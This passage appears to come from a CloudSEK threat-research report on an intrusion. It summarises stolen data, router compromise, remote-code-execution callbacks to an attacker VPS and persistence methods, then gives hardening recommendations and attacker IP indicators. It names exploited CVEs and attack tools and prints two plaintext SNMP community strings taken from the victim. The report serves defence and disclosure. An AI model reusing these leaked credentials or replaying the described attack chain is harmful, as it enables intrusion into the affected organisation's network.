1.3M+ customer records extracted via Oracle SQL spooling (dump_batch.sh, 100K-row increments)
407MB BloodHound Active Directory dataset exfiltrated — full trust and privilege map
SSL private keys streamed live via PostgreSQL sys_eval piped to Netcat listener
SAP service account hashes extracted (WF-BATCH, TMSADM, OSS_RFC — all SAP_ALL profile)
Chrome LoginData, DPAPI master key, 11KB Kerberoastable hashes, NTLM captures
Historical database backup (2016) recovered — legacy credentials and long-term org intel

Network-layer control

Cisco router RT01-IBM-PRINCIPAL-IDE confirmed compromised via TCL script injection
GRE tunnel programmatically configured on IOS-XE router pointing to attacker VPS (62.171.185.97)
Read-write SNMP community strings extracted (M0n4d0Cn0C#, Cn0C.SnMpR1_iDe)
BGP neighbour data exfiltrated — provides capability for traffic redirection
MitM potential across network segments with persistent routing-level access

Confirmed RCE

200.79.113.136 — Wget/1.18 RCE beacon received on port 8888 (callback8888.log)
201.144.122.60 — second independent Wget RCE callback confirmed (rce_callback.log)
135.237.122.202 — Log4Shell JNDI callback string MGLNDD_62.171.185.97_1389 received
201.144.122.58 — interactive shell obtained as postgres user on Ubuntu PostgreSQL 9.5
Zerologon validated against domain controller; PwnKit delivering uid=0 on Linux hosts

Long-dwell persistence

Chisel server logged 3,708 sessions across a confirmed 13-day window (Jan 28 – Feb 10)
Neo-reGeorg webshells deployed across Java, .NET, and PHP stacks in six variants
ZipSlip dropper (mkzip34.py) re-establishes webshell on archive restoration — designed to survive incident response
AnyDesk configs and N-able LNK files mimic legitimate RMM agents for low-visibility persistence

9. Recommendations

9.1 Perimeter Device Hardening

Apply all Fortinet FortiOS security advisories immediately, prioritising CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762; enable SSL inspection on VPN management interfaces
Apply all Ivanti Connect Secure patches; implement network segmentation isolating VPN appliances from internal trust zones
Disable Cisco IOS TCL scripting on production routers; restrict SSH access to management interfaces via ACL; audit for unexpected tunnel interfaces
Disable Apache Tomcat AJP connector or restrict to localhost if not required; apply GhostCat patch (CVE-2020-1938)

9.2 SMB and Legacy Protocol Controls

Disable SMBv1 across all Windows infrastructure immediately; apply MS17-010 patches on all legacy systems
Apply CVE-2020-0796 (SMBGhost) patches on Windows 10 and Server 2019 nodes
Block SMB (445/TCP) at perimeter and between network segments where not operationally required

9.3 Application Layer Security

Disable GeoServer WFS if not required; apply all GeoServer security patches and restrict WFS access to authenticated users only
Apply Oracle CPU patches; restrict DBMS_SCHEDULER execution privileges; audit UTL_FILE directory access objects
Harden SAP RFC interfaces: disable SXPG_CALL_SYSTEM for non-admin users; audit SXPGCOSTAB for unauthorised command entries; implement RFC gateway security
Patch all Java application servers against CVE-2021-44228 (Log4Shell) and remove vulnerable commons-collections versions

9.4 Credential and Identity Protection

Implement MFA on all VPN, RDP, and administrative interfaces — prevent credential-based lateral movement even when credentials are compromised
Rotate all credentials immediately if FortiGate configuration dumps may have been exfiltrated; check for cleartext VPN credentials in config files
Implement Kerberos AES encryption; disable RC4-HMAC to prevent Kerberoasting attacks
Audit Group Policy Preferences for encrypted passwords (cpassword); remove GPP credential storage

9.5 Network Visibility and Segmentation

Deploy network detection for SOCKS5 proxy chains, GRE tunnels to external IPs, and TCP-over-HTTP patterns characteristic of Chisel
Monitor for unexpected GRE tunnel interface creation on Cisco IOS/IOS-XE devices
Implement TFTP monitoring — the threat actor used TFTP for network device configuration exfiltration on a typically unmonitored protocol
Segment SAP and Oracle environments from general enterprise networks; restrict RFC and database port access via firewall policy

9.6 Endpoint and Application Monitoring

Deploy file integrity monitoring on web server directories to detect webshell deployment (especially .jsp, .jspx, .aspx, .php additions)
Alert on ZIP/WAR archive deployments containing ../ path traversal entries (ZipSlip detection)
Monitor for pkexec execution followed by UID change to 0 (PwnKit detection)
Audit and restrict AnyDesk and N-able RMM deployments to approved, inventoried instances only

10. Appendix

Operator infrastructure:

CloudSEK Threat Actor IP Table

IP Address (Threat Actor)	Usage
62.171.185.97	Primary operator VPS (reverse shell listener, canary, all payload callbacks)
165.22.184.26	Secondary relay server (SOCKS5 ports 1080, 5554, 5571)
185.65.245.10:7227	Possible secondary C2

11. References

Koushik Pal

Threat Researcher at CloudSEK, specializing in digital forensics, incident response, and adversary hunting to uncover attacker motives, methods, and operations.

No items found.